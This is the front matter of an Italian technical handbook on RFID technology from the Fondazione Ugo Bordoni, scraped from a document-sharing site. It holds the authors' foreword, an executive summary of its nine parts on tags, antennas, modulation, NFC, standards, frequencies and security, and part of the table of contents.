rfid - fondazione bordoni - rfid fondamenti tecnologia 2ed

445
RFID Fondamenti di una tecnologia silenziosamente pervasiva di Paolo Talone, Giuseppe Russo Fondazione Ugo Bordoni Ubaldo Montanari per la documentazione industriale e fotografica Stefania Vinci, Consuelo Tuveri progetto grafico e impaginazione

Upload: psavaz

Post on 30-Dec-2015

327 views

Category:

Documents


5 download

DESCRIPTION

Studio Fondazione Bordoni sulla tecnologia RFID

TRANSCRIPT

Page 1: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIDFondamenti di una tecnologiasilenziosamente pervasiva

di Paolo Talone, Giuseppe RussoFondazione Ugo Bordoni

Ubaldo Montanariper la documentazione industriale e fotografica

Stefania Vinci, Consuelo Tuveriprogetto grafico e impaginazione

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 1

Page 2: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

DUE PAROLE DAGLI AUTORI3

Ogni qual volta una tecnologia si affaccia con prepotenza sul mercato,facendo presagire applicazioni massive (come è certamente il caso diRFID), nasce nei tecnici professionisti e negli utilizzatori più consapevolila necessità di un manuale che riassuma le conoscenze attinenti la tecno-logia in oggetto.

Questo è quanto propongono gli autori.Il taglio dell’opera oscilla dalla tentazione di un trattato scientifico, che

inevitabilmente riduce la platea dei lettori, alla necessità di un’operadivulgativa, che per agevolare la comprensione, si omologa con articoligiornalistici, all’opportunità di un testo aperto alle realtà industriali chemostri quanto realmente si produce e si può trovare in commercio.

Non sta agli autori giudicare il dosaggio di questi differenti ingredien-ti e, in definitiva, il successo della formula dell’opera.

Per parte loro essi vogliono, con questa seconda edizione, proporre untesto che sperano trovi un posto stabile sulla scrivania di coloro che diRFID si occupano o si vogliono occupare.

A proposito del taglio dell’opera, sarà immediato notare che, per scel-ta editoriale, non vengono trattate applicazioni RFID.

Nel nostro paese infatti, ai cui lettori quest’opera è diretta, si svolgonoannualmente una dozzina di convegni di buon livello quasi interamentededicati alle applicazioni RFID.

La scelta degli autori non è stata pertanto di concorrenza, bensì disinergia con questa realtà, proponendo un manuale di tecnologia utile percomprendere il senso e l’evoluzione dei nuovi prodotti e delle applicazio-ni che si affacciano sul mercato.

DUE PAROLE DAGLI AUTORI

2-sommario_Ital..qxp:RFID 9-09-2008 10:45 Pagina 3

Page 3: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

EXECUTIVE SUMMARY5

RFID non si potrebbe, a rigore, definire tecnologia “nuova”, risalendo leprime applicazioni agli inizi delle radiocomunicazioni. Tuttavia è indub-bio che in questi anni stia letteralmente “esplodendo” sul mercato e chel’ipotesi (per la verità non troppo fantascientifica) di dotare di TAG aradiofrequenza tutte le “cose” presenti nel nostro mondo rendendole così“parlanti”, sta aprendo scenari inediti per la nostra civiltà.Comunque sia, è indubbio che questa tecnologia si affaccia ora con

prepotenza sul mercato, facendo presagire applicazioni massive.In tale contesto gli autori propongono questo manuale che riassume le

conoscenze attinenti la tecnologia e vuole essere una guida per l’interpre-tazione delle applicazioni, che, per scelta editoriale, non vengono trattatein questa opera.

LE NOVITÀ DELLA SECONDA EDIZIONE

In questa seconda edizione circa la metà dell’opera ha subito una profon-da rivisitazione.Si evidenzia la Parte VII, sulle frequenze, che, per le intercorse decisio-

ni a livello comunitario ed il loro recepimento in ambito italiano, descri-ve ora un quadro stabile ed uniforme a livello europeo e nazionale, bendiverso da quello ricco di perplessità che emergeva dall’edizione prece-dente.Emerge anche la Parte VIII, dedicata alla sicurezza e privacy dei siste-

mi RFID, evoluta da pochi paragrafi a parte autonoma, che propone unquadro esaustivo delle problematiche della materia, oggi di stretta attua-lità dopo la pubblicazione della Raccomandazione europea in merito.Nella Parte II, “Categorizzazione & Tecnologie costruttive”, in gran

parte rinnovata, si evidenzia una serie di capitoli, di fonte industriale, sulletecniche di produzione dei TAG passivi e delle relative antenne. Si trattadi attività di grande importanza ed interesse, in cui stanno emergendosituazioni di pregio nella realtà produttiva nazionale.

EXECUTIVE SUMMARY

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 5

Page 4: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Nella Parte V, dedicata a tecnologie “collaterali” con gli RFID, è stataapprofondita la trattazione degli NFC (Near Field Communication), ilcosiddetto “tocco magico”, che si profila come una delle applicazioni piùinteressanti e massive, associata ai terminali di telefonia mobile, per paga-menti senza contatto, serrature elettroniche e acquisizione di informazio-ni da oggetti con TAG.Anche nella Parte I, in gran parte immutata a causa del carattere pret-

tamente divulgativo, si può notare l’inserimento di un’analisi economicasui costi di produzione dei TAG. L’analisi, di fonte industriale nazionale,mette in luce interessanti aspetti per la pianificazione degli investimentidell’industria italiana.Ultima, ma non certo in ordine di importanza, la nuova Parte III:

“Accoppiamento, energia & antenne nei TAG passivi”. Questa parte,tratta da articoli pubblicati su riviste scientifiche, offre una trattazionerigorosa e strettamente tecnica. È dedicata da un lato ai progettisti diTAG passivi, in cui molte prestazioni dipendono, appunto dalle antenne;dall’altro lato ai tecnici che si occupano del complesso problema dellacopertura a radiofrequenza nelle applicazioni RFID.

LE PARTI DELL’OPERACome nell’edizione precedente, il lavoro si presenta diviso in “Parti” (sezio-ni), ciascuna delle quali tratta argomenti specifici. Fa eccezione la Parte I acarattere introduttivo ed enciclopedico. Viene quindi confermato il caratte-re di un’opera dedicata alla consultazione, che abbraccia la totalità delleproblematiche tecnologiche attinenti gli RFID ed in cui il lettore espertopotrà quindi direttamente consultare gli argomenti d’interesse.

Parte I – Introduzione agli RFID

Si caratterizza come una sezione propedeutica, dedicata al lettore conmeno dimestichezza con le tecnologie; si presta pertanto anche ad una let-tura indipendente dal prosieguo del testo.Vengono introdotte le problematiche tecniche che verranno poi appro-

fondite nelle altri parti del libro. Dopo questa parte, quindi, è possibilepassare direttamente all’approfondimento delle problematiche tecnologi-

RFID - Fondamenti di una tecnologia silenziosamente pervasiva6

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 6

Page 5: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

che, regolamentari o di sicurezza.Oggetto di questa parte sono:

- Nozioni preliminari su TAG, Reader e sistemi RFID.- Categorizzazione tecnologica degli apparati RFID con classificazione

per standard, frequenze, tecnologie ed applicazioni.- Applicazioni dei sistemi RFID e sicurezza.

Completano la prima parte alcuni paragrafi dedicati all’aspetto eco-nomico:- Analisi dei costi industriali della tecnologia RFID.- Prospettive economiche e di mercato.

Parte II – Categorizzazione & tecnologie costruttive

Vengono illustrati gli aspetti realizzativi attinenti a TAG e Reader. Questaparte, per lo più tratta da informazioni di fonte industriale, vuole fornireuna panoramica di quanto è disponibile sul mercato ed essere quindid’aiuto nella scelta delle differenti opzioni tecnologiche.

Gli argomenti trattati riguardano essenzialmente:- Categorizzazione di base nella tecnologia RFID, che si fonda:• sulla tipologia di alimentazione che porta a distinguere i TAG tra pas-sivi, semi passivi e attivi;

• sui principi fisici della comunicazione tra TAG e Reader che porta adistinguere tra TAG ad accoppiamento induttivo o elettromagnetico.

- Tecniche di produzione dei TAG.- Antenne dei sistemi RFID e conseguenti problemi di costruzione, che

influiscono significativamente sulle prestazioni del sistema.- Caratteristiche di memoria e contenitori di TAG, che giocano un ruolo

di primo piano nel progetto delle applicazioni.- Architettura dei sistemi RFID, che rappresenta un modello di ecosiste-

ma per lo sviluppo delle applicazioni.

Parte III – Accoppiamento, energia & antenne nei TAG passivi

Vengono illustrati gli aspetti elettromagnetici attinenti ai TAG passivi.Questa parte, per lo più tratta da articoli pubblicati su riviste scientifiche,vuole essere un ausilio per i progettisti di antenne e di sistemi. Vengono

EXECUTIVE SUMMARY7

2-sommario_Ital..qxp:RFID 9-09-2008 10:45 Pagina 7

Page 6: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

discussi in dettaglio:- Principi fisici della comunicazione dei TAG ad accoppiamento indut-

tivo o elettromagnetico.- Potenze e distanze operative nei TAG passivi, nonché problemi di

orientamento e polarizzazione.- Principi di progettazione delle antenne per accoppiamento elettroma-

gnetico.- Panoramica delle più recenti tecnologie d’antenna per TAG ad alta fre-

quenza.- Parametri e modelli per la copertura di ambienti con sistemi RFID.

Parte IV – Codifiche & modulazioni

È dedicata all’approfondimento tecnologico del livello fisico della radio-comunicazione tra TAG e Reader.

Ideale continuazione di quella precedente, questa parte vuole ancoraessere un ausilio per progettisti di sistemi o per coloro che voglianoapprofondire il quadro tecnologico.

Vengono illustrati:- Codifica dei dati, ovvero il modo di generare un segnale binario a par-

tire dai dati che il dispositivo (TAG o Reader) ha in memoria. Vengonotrattate anche tecniche che sfruttano la codifica per ottenere un ottima-le trasferimento di potenza o particolari effetti nella modulazione delsegnale radio.

- Tecniche di modulazione del segnale radio, con particolare riguardo asistemi rivolti a TAG passivi che richiedono accortezze particolari.Vengono anche forniti cenni sulla struttura dei ricevitori.

- Tecniche di interrogazione del Reader e tecniche di risposta dei TAG(protocolli anti collisione). Vengono anche trattati metodi di sincroniz-zazione tra interrogazioni e risposte, specie nei casi in cui molti TAG ediversi Reader condividono il medesimo ambiente operativo.

Parte V – Ulteriori tecnologie di prossimità

Sono presentate alcune tecnologie in qualche modo “contigue” alle appli-cazioni RFID.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva8

2-sommario_Ital..qxp:RFID 9-09-2008 10:45 Pagina 8

Page 7: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Queste tecnologie hanno in comune tra loro la radiocomunicazione “diprossimità”, differiscono invece per le applicazione per le quali sono stateprogettate.Sono essenzialmente due gruppi:

- apparati NFC (Near Field Communication), che associati ai telefoninisi candidano come sistemi a larga diffusione, sostituti delle smart cardsenza contatto per pagamenti, serrature elettroniche e acquisizione diinformazioni da oggetti con TAG.

- RFID attivi con tecnologie UWB (Ultra Wide Band), dalle prestazioniinnovative e particolarmente adatti alla radiolocalizzazione

- RFId a standard WiFi, una piccola nicchia tecnologica utile in determi-nate situazioni.Si tratta di tecnologie a tutti gli effetti impiegate per applicazioni RFID,

ma non illustrate in precedenza per non appesantire la trattazione.- ZigBee e Wibree (Bluetooth Low Energy).Si tratta di tecnologie pensate per applicazioni differenti da RFID, ma

che, per le loro caratteristiche intrinseche, potrebbero essere impiegatecome TAG attivi ad alte prestazioni, offrendo anche caratteristiche parti-colarmente innovative.Valgano come esempio le reti “mesh” realizzabilicon ZigBee nelle applicazioni domotiche.

Parte VI – Standard & Protocolli di comunicazione

Si tratta della prima delle due parti dedicate alla standardizzazione, pro-blema di fondamentale importanza per la tecnologia RFID, come pertutte le applicazioni che richiedono interoperabilità tra entità diverse edintercambiabilità tra apparati di differenti costruttori.Questa parte è dedicata agli standard di comunicazione ed è per lo più

tratta dagli standard medesimi, pubblicati dai competenti organismi inter-nazionali. La parte vuole essere una sorta di manuale per la consultazionedegli standard fornendone una sintesi.L’articolazione della Parte VI è la seguente:

- Vengono introdotte dapprima le problematiche internazionali, conparticolare attenzione alle diverse condizioni operative nei consorziprivati (EPCglobal)e negli enti pubblici di normativa (ISO); fornendo

EXECUTIVE SUMMARY9

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 9

Page 8: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

anche un quadro internazionale degli enti ed associazioni collegate.- Successivamente viene illustrata la normativa prodotta dai due grandi

enti ISO ed EPCglobal, con particolare interesse per i nuovi TAGRFID passivi “Generation2”, i maggiori candidati all’applicazione mas-siva sui singoli oggetti (corrispondente alla produzione di centinaia dimiliardi di TAG da parte dell’industria).

Parte VII – Allocazione in frequenza

Si tratta della seconda delle due parti dedicate alla standardizzazione ed èdedicata a problemi di fondamentale importanza per la tecnologia RFID,come per tutte quelle basate sulla radiofrequenza:- L’allocazione delle bande dello spettro radio alle applicazioni RFID.- Le potenze consentite nella trasmissione radio.

Questa parte è, come la precedente, per lo più tratta dai documentipubblicati dai competenti organismi internazionali e vuole ancora essereuna sorta di manuale di consultazione fornendo una sintesi delle norme.

L’articolazione della Parte VII è la seguente:- Sono dapprima introdotte le problematiche internazionali, con partico-

lare attenzione alle diverse condizioni operative in Europa e nel restodel mondo.

- È successivamente illustrata la normativa europea, ponendo attenzioneal recente riordino delle bande assegnate agli RFID ed, in particolare,all’assegnazione della banda UHF, candidata ad ospitare applicazionimassive per l’identificazione dei singoli oggetti.

- È infine illustrata nel dettaglio la normativa nazionale che storicamen-te fa capo al “Piano Nazionale Ripartizione delle Frequenze”, e che, direcente, è stata riordinata, recependo la nuova normativa europea.

Parte VIII – Sicurezza & Privacy nei sistemi RFID

Questa parte è dedicata a problemi particolarmente dibattuti dall’opinio-ne pubblica e di grande interesse per gli integratori di sistemi che devonoevitare contenziosi che compromettano la diffusione dei servizi: si trattadelle problematiche di Sicurezza & Privacy nei sistemi RFID.

Vengono approfondite le principali tipologie di threat (attacchi alla

RFID - Fondamenti di una tecnologia silenziosamente pervasiva10

2-sommario_Ital..qxp:RFID 9-09-2008 10:45 Pagina 10

Page 9: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

sicurezza), le applicazioni pratiche delle tecniche di attacco ed i possibiliprovvedimenti che sono o potrebbero essere adottati.

Una particolare attenzione viene dedicata alle problematiche di pri-vacy, derivanti dall’acquisizione dei dati personali di utenti che, volonta-riamente o meno, siano in possesso di TAG RFID.

Vengono illustrati dettagli delle tecniche di sicurezza informatica qualila cifratura dei dati con funzioni hash e firma elettronica, la mutua auten-ticazione tra TAG e Reader e l’allestimento di un “canale sicuro” per laloro comunicazione.

Infine un significativo capitolo viene dedicato alla problematica deicosiddetti “sigilli elettronici” che stanno acquistando un ruolo essenzialenella sicurezza dei trasporti.

Parte IX – Appendici & Bibliografia

Questa parte è dedicata ad approfondimenti di temi non trattati in prece-denza per non appesantire la trattazione ed alla bibliografia generale del-l’opera. La parte si articola in:- Potenze di emissione a RF: ERP vs. EIRP.- Ruolo e funzoni di EPC global.- Identificativi delle merci: Codici a barre mono e bidimensionali.- Funzioni hash crittografiche.- Compendio degli standard EPCglobal, ISO ed ECMA, in cui vengono

riportati gli elenchi degli standard e gli abstract originali.- Bibliografia generale dell’opera.

EXECUTIVE SUMMARY11

2-sommario_Ital..qxp:RFID 9-09-2008 10:45 Pagina 11

Page 10: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

13 SOMMARIO

SOMMARIO

DUE PAROLE DAGLI AUTORI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3

EXECUTIVE SUMMARY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5

PARTE 1 – INTRODUZIONE AGLI RFID . . . . . . . . . . . . . . . . . . . . . . . . .41

I.1 Nozioni preliminari . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .43I.1.1 Generalità e Storia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .43I.1.2 Componenti del sistema . . . . . . . . . . . . . . . . . . . . . . . . . .44I.1.3 I TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44

1.3.1 Struttura fisica dei TAG passivi . . . . . . . . . . . . . .47I.1.4 I Reader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .49I.1.5 Le applicazioni . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .50

1.5.1 La catena di distribuzione . . . . . . . . . . . . . . . . . . .51I.1.6 Le frequenze . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .53I.1.7 Ciclo di vita dei TAG e Privacy . . . . . . . . . . . . . . . . . . . .54I.1.8 Sicurezza . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .56

I.2 Standard dei TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .60I.3 Classificazione dei TAG per Frequenze/Tecnologie . . . . . . . . .62

I.3.1 TAG induttivi LF - 120÷145 kHz . . . . . . . . . . . . . . . . . .62I.3.2 TAG induttivi HF - 13,56 MHz . . . . . . . . . . . . . . . . . . .63I.3.3 TAG elettromagnetici UHF media - 860÷950 MHz . . .65I.3.4 TAG elettromagnetici UHF alta e SHF

banda 2,4 GHz . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .67I.4 Classificazione dei TAG per Standard/Frequenze/Applicazioni .68

I.4.1 Identificazione di animali . . . . . . . . . . . . . . . . . . . . . . . . .69I.4.2 Logistica ed identificazione di oggetti . . . . . . . . . . . . . . .69I.4.3 Carte elettroniche senza contatto . . . . . . . . . . . . . . . . . .71I.4.4 Near Field Communication (NFC) . . . . . . . . . . . . . . . . .72I.4.5 Tabella di confronto tra smart card senza contatto,

NFC e TAG RFID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .75I.4.6 Tabella di confronto di TAG per Frequenze

operative/Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .764.6.1 Altre frequenze . . . . . . . . . . . . . . . . . . . . . . . . . . . .77

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 13

Page 11: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

14 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

I.4.7 Tabella e grafici di confronto di TAGper Frequenze/Prestazioni . . . . . . . . . . . . . . . . . . . . . . . . .77

I.4.8 Costi industriali dei TAG . . . . . . . . . . . . . . . . . . . . . . . . .79I.4.9 Prospettive Economiche e di mercato . . . . . . . . . . . . . . .84I.4.10 Criticità e Opportunità per lo sviluppo . . . . . . . . . . . . .88

PARTE II – CATEGORIZZAZIONE E TECNOLOGIE COSTRUTTIVE . . .93II.1 Categorizzazione dei TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .95

II.1.1 TAG passivi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .95II.1.2 Battery Assisted TAG (semi-passivi) . . . . . . . . . . . . . . . .96II.1.3 TAG attivi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .97

II.2 Accoppiamento TAG-Reader nei sistemi passivi . . . . . . . . . . . .99II.2.1 “Campo vicino” e “Campo lontano” . . . . . . . . . . . . . .100

II.3 Tecniche di produzione dei TAG . . . . . . . . . . . . . . . . . . . . . . .101II.3.1 Processo di assemblaggio “Inlay” . . . . . . . . . . . . . . . . .102

3.1.1 Direct Chip Attach (chip to antenna) . . . . . . . . .1043.1.2 I processi che richiedono un modulointermedio (STRAP) . . . . . . . . . . . . . . . . . . . . . . . . . . .1043.1.3 Metodi senza connessione elettrica . . . . . . . . . . .1053.1.4 Metodi con antenna stampata sull’oggetto . . . . .105

II.3.2 Flip Chip Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .106II.4 Antenne nei sistemi RFID . . . . . . . . . . . . . . . . . . . . . . . . . . . .109

II.4.1 Materiali e tecniche di produzione perantenne di TAG passivi . . . . . . . . . . . . . . . . . . . . . . . . .109

II.4.2 Antenne per i TAG ad accoppiamentoelettromagnetico . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .111

II.4.3 Antenne per TAG passivi ad accoppiamento induttivo .1134.3.1 Problematiche produttive . . . . . . . . . . . . . . . . . . .1134.3.2 Antenne in filo di rame . . . . . . . . . . . . . . . . . . . . .1144.3.3 Confronto tra tecniche ad incisione ed a filo . . . .1164.3.4 Un esempio di nuove soluzioni realizzabili

con tecnologia del filo . . . . . . . . . . . . . . . . . . . . . .117II.4.4 Antenne multifrequenza e sensoristica avanzata

nel progetto IntelliSense RFID . . . . . . . . . . . . . . . . . . .118

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 14

Page 12: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

15 SOMMARIO

II.4.5 Accoppiamento induttivo in TAG UHF . . . . . . . . . . . .120II.4.6 Antenne per Reader di TAG passivi . . . . . . . . . . . . . . .122

4.6.1 Polarizzazione delle antenne del Reader . . . . . . .125II.5 Tecnologie per Reader di TAG passivi . . . . . . . . . . . . . . . . . .126

II.5.1 Ricevitori nei Reader per TAG passivi. . . . . . . . . . . . .128II.5.2 Distanze operative Reader =>TAG passivi . . . . . . . . . .131

II.6 Tecnologie per TAG passivi . . . . . . . . . . . . . . . . . . . . . . . . . . . .131II.6.1 Memorie per TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . .132II.6.2 Contenitori per TAG ed assemblaggio . . . . . . . . . . . . .136

6.2.1 Stampanti di etichette RFID . . . . . . . . . . . . . . . . .137II.7 Parametri per la scelta di un TAG . . . . . . . . . . . . . . . . . . . . . .138II.8 Infrastrutture informative per sistemi RFID . . . . . . . . . . . . . .138

PARTE III – ACCOPPIAMENTO, ENERGIA E ANTENNENEI TAG PASSIVI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141

III.1 Accoppiamento induttivo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .143III.2 Accoppiamento elettromagnetico . . . . . . . . . . . . . . . . . . . . . . .146

III.2.1 L’effetto Scattering . . . . . . . . . . . . . . . . . . . . . . . . . . . . .146III.2.2 Modalità operativa . . . . . . . . . . . . . . . . . . . . . . . . . . . . .147

III.3 Potenze e distanze operative nei TAG passivi . . . . . . . . . . . . .150III.3.1 Accoppiamento induttivo . . . . . . . . . . . . . . . . . . . . . . .150III.3.2 Accoppiamento elettromagnatico (UHF ed SHF) . . . .152

3.2.1 Potenza ricevuta dal TAG . . . . . . . . . . . . . . . . . .1523.2.2 Distanza operativa dei TAG

passivi elettromagnetici . . . . . . . . . . . . . . . . . . . .156III.3.3 Circuito di alimentazione del TAG . . . . . . . . . . . . . . . .161III.3.4 Distanza operativa vs. Orientamento delle antenne

e polarizzazione del segnale . . . . . . . . . . . . . . . . . . . . . .163III.4 Progetto di antenne per TAG passivi UHF . . . . . . . . . . . . . . .165

III.4.1 Metodi per l’adattamento complesso di impedenza . . .1664.1.1 Adattamento con T-match . . . . . . . . . . . . . . . . . .1674.1.2 Adattamento con Loop accoppiato . . . . . . . . . . .1694.1.3 Adattamento con Slot innestata . . . . . . . . . . . . . .170

III.4.2 Metodi di miniaturizzazione dell’antenna . . . . . . . . . . .172

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 15

Page 13: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

16 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

4.2.1 Miniaturizzazione con Meander Line . . . . . . . . .1724.2.2 Configurazioni ad ‘F’ invertita . . . . . . . . . . . . . . .1744.2.3 Larghezza di banda . . . . . . . . . . . . . . . . . . . . . . . .175

III.4.3 Altre tecniche di progetto . . . . . . . . . . . . . . . . . . . . . . .1774.3.1 TAG dual band . . . . . . . . . . . . . . . . . . . . . . . . . . .1784.3.2 TAG con doppia polarizzazione . . . . . . . . . . . . . .1784.3.3 TAG UHF per Near Field Communication . . . .179

III.4.4 Misura e test di antenne per TAG passive in UHF . . .1804.4.1 Misura dell’impedenza d’ingresso e del guadagno 1804.4.2 Misura della Radar cross section del TAG . . . . .1814.4.3 Misura della distanza di lettura . . . . . . . . . . . . . .182

III.4.5 Misura e test di antenne per TAG passive in UHF . . .182III.5 Stima della regione di funzionamento nell’ambiente operativo183

III.5.1 Parametri e modelli . . . . . . . . . . . . . . . . . . . . . . . . . . . .1835.1.1 Definizione dei parametri di un sistema RFID . .1855.1.2 Il modello in spazio libero . . . . . . . . . . . . . . . . . .1885.1.3 Il modello a due raggi . . . . . . . . . . . . . . . . . . . . . .1895.1.4 Il modello a ray-tracing . . . . . . . . . . . . . . . . . . . . .191

III.5.2 Casi di studio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1945.2.1 Stanze vuote . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1945.2.2 Stanze arredate ed in presenza di persone . . . . . .199

PARTE IV – CODIFICHE E MODULAZIONI . . . . . . . . . . . . . . . . . . . . 201IV.1 Codifica dei dati . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .203

IV.1.1 Codifica Manchester . . . . . . . . . . . . . . . . . . . . . . . . . . .204IV.1.2 Codifica PIE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .205IV.1.3 Codifiche Miller e FM0 . . . . . . . . . . . . . . . . . . . . . . . . .205

IV.2 Tecniche di modulazione dei sistemi passivi . . . . . . . . . . . . . .206IV.2.1 Principali tecniche di modulazione . . . . . . . . . . . . . . . .208

2.1.1 Tecniche DSB-ASK e SSB-ASK(banda laterale doppia e banda laterale unica) . . . . . . .2082.1.2 Tecnica PR-ASK . . . . . . . . . . . . . . . . . . . . . . . . . .209

IV.2.2 Modulazione Reader =>TAG . . . . . . . . . . . . . . . . . . . .210

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 16

Page 14: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

17 SOMMARIO

IV.2.3 Ricezione nel TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . .211IV.2.4 Modulazione TAG =>Reader . . . . . . . . . . . . . . . . . . . .213

2.4.1 Risposte dei TAG (in banda e fuori banda) . . . . .2152.4.2 Sistemi FDX, HDX e SEQ . . . . . . . . . . . . . . . . . .216

IV.3 Comunicazione Reader <=> TAG . . . . . . . . . . . . . . . . . . . . . .218IV.3.1 Tecniche di sincronizzazione tra TAG . . . . . . . . . . . . .219

3.1.1 Etichette intelligenti ed esplosione dei dati . . . . .219IV.3.2 Protocolli anti collisione - Tecniche . . . . . . . . . . . . . . .220

3.2.1 Protocolli anti collisione - Standard . . . . . . . . . . .2223.2.2 Tecniche avanzate di identificazione

in ambiente di Reader multipli . . . . . . . . . . . . . .223IV.3.3 Tecniche di interrogazione del Reader:

Listen Before Talk vs. Frequency Hopping . . . . . . . . .2253.3.1 Listen Before Talk & Adaptive

Frequency Agility . . . . . . . . . . . . . . . . . . . . . . . . .2253.3.2 Frequency Hopping . . . . . . . . . . . . . . . . . . . . . . .2263.3.3 Occupazione del canale radio:

la tecnica del “Duty Cycle” . . . . . . . . . . . . . . . . . .227

PARTE V – ULTERIORI TECNOLOGIE DI PROSSIMITÀ . . . . . . . . . . . 231V.1 Tecniche a banda larga e dispersione di spettro . . . . . . . . . . . .233

V.1.1 Cenni sui sistemi a dispersione di spettro . . . . . . . . . . .233V.1.2 Generalità sui sistemi a banda ultra larga . . . . . . . . . . .236V.1.3 High bitrate PAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .238V.1.4 Direct Sequence UWB (UWB Forum) [22] . . . . . . . . .239V.1.5 Multi-band Orthogonal Frequency Division

Multiplexing (WIMedia Alliance)[23] . . . . . . . . . . . . .240V.1.6 Applicazioni a TAG passivi RFID . . . . . . . . . . . . . . . . .242V.1.7 Applicazioni a TAG attivi RFID . . . . . . . . . . . . . . . . . .243

1.7.1 Applicazioni italiane UWB . . . . . . . . . . . . . . . . . .243V.2 RFID a 2,45 GHz ed RFID a standard WiFi . . . . . . . . . . . . . .245V.3 Wibree (Bluetooth Low Energy) . . . . . . . . . . . . . . . . . . . . . . . .246V.4 ZigBee . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .248

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 17

Page 15: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

18 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

V.4.1 Tecnologia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .250V.4.2 Architettura e stack protocollare delle reti ZigBee . . . 252

V.5 Near-Field-Communication (NFC) . . . . . . . . . . . . . . . . . . . . . 255V.5.1 Tecnologia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256

5.1.1 Integrazione tra NFC e dispositivo d’utente . . . . 2585.1.2 Gestione delle applicazioni Over-The-Air:

la tecnologia OTA . . . . . . . . . . . . . . . . . . . . . . . . 2595.1.3 Sicurezza nei dispositivi NFC . . . . . . . . . . . . . . . 261

V.5.2 Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2615.2.1 ISO ECMA ed ETSI . . . . . . . . . . . . . . . . . . . . . . 2615.2.2 NFC Forum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2625.2.3 La posizione GSMA su “mobile NFC” . . . . . . . 2645.2.4 Mobile Payment Forum . . . . . . . . . . . . . . . . . . . . 268

V.5.3 Applicazioni . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2685.3.1 Informazioni su oggetti (Reader mode) . . . . . . . 2695.3.2 Ticketing / Micro Pagamenti (Carta Contactless) 2705.3.3 Accoppiamento di apparati (Device Pairing) . . . 2745.3.4 Il progetto europeo StoLPaN . . . . . . . . . . . . . . . 2755.3.5 Principali progetti applicativi . . . . . . . . . . . . . . . 276

V.5.4 Modelli di business & Previsioni di mercato . . . . . . . . 277V.6 Tecnologie wireless a confronto . . . . . . . . . . . . . . . . . . . . . . . . 279

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE . . . . 281VI.1 Normativa per le interfacce di comunicazione . . . . . . . . . . . . 283

VI.1.1 La standardizzazione delle interfacce di comunicazione 283VI.1.2 Applicazioni open loop vs. closed loop . . . . . . . . . . . . 284VI.1.3 Gli Enti di normazione . . . . . . . . . . . . . . . . . . . . . . . . .285

1.3.1 Situazione in Europa . . . . . . . . . . . . . . . . . . . . . . 2861.3.2 Situazione in USA . . . . . . . . . . . . . . . . . . . . . . . . 2861.3.3 Situazione in Cina . . . . . . . . . . . . . . . . . . . . . . . . . 286

